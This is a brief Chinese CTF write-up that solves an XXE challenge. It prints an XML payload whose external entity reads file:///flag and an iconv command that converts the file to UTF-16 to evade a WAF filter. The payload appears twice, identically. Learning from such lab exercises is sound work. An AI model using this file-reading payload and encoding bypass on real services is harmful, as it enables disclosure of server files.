不知道刷了多少天了,又是一题关于xxe漏洞的。
web的习惯性操作。
1.功能点&cms
2.源代码
3.敏感文件泄露
当然这是我个人的习惯。这里进入界面后又upload功能,不会是传马吧。但是旁边给了上传文件格式。仅仅只看界面似乎没什么区别,源代码,启动!!!
很明显,xml的格式。猜测这里需要上传xml文件,漏洞属于xxe。最右边给出了提示flag在根目录下边。
<users>
<user>
<username>111</username>
<password>111</password>
<name>111</name>
<email>111</email>
<group>1111</group>
</user>
</users>
上传成功,有回显。
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///flag" >
]>
<users>
<user>
<username>&xxe;</username>
<password>&xxe;</password>
<name>&xxe;</name>
<email>&xxe;</email>
<group>&xxe;</group>
<intro>&xxe;</intro>
</user>
</users>
构造payload,又给提示,被防火墙拦截了。。。
怎么绕过呢?转换编码即可,utf16
cat 1.xml | iconv -f utf8 -t utf-16 1.xml>2.xml
iconv是liunx转编码的命令
emmmm,怎么还有长度限制,不过看了一下user界面,还有个标签intro
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///flag" >
]>
<users>
<user>
<username>&xxe;</username>
<password>&xxe;</password>
<name>&xxe;</name>
<email>&xxe;</email>
<group>&xxe;</group>
<intro>&xxe;</intro>
</user>
</users>
记得自己转码哦